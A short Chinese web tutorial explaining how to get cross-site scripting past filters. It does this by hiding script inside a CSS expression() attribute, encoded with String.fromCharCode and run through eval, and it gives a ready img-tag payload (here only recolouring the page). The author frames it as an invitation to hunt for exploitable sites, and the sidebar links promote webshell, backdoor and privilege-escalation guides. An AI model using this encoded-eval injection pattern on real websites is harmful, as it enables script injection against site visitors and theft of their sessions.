手机
当前位置:查字典教程网 >实用技巧 >安全教程 >expression&eval跨站的一个方法
expression&eval跨站的一个方法
摘要:expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.我这里要说的是另外一...

expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.

我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.

<imgsrc="#"style="Xss:expression(eval(

String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">

嘿嘿,大把的XSS等你去挖掘,ENJOYIT:)

【expression&eval跨站的一个方法】相关文章:

dvbbs 8.2 SQL Injection注射漏洞分析

历代木马程序隐身的技术分析第1/2页

最新的无权限挂马方式

NtGodMode.exe任意密码登录windows系统帐号下载

变态入侵之有史以来最酷的Windows后门sethc.exe

巧用端口映射 不通过网关开放任意内网(LCX.exe)

Ring的权限提升21中方法

不用xp_cmdshell照样执行命令

phpMyAdmin 后台拿webshell

QQ密码被盗怎么办 (教你如何找回QQ密码)

上一篇: XSS 0DAY代码
精品推荐
分类导航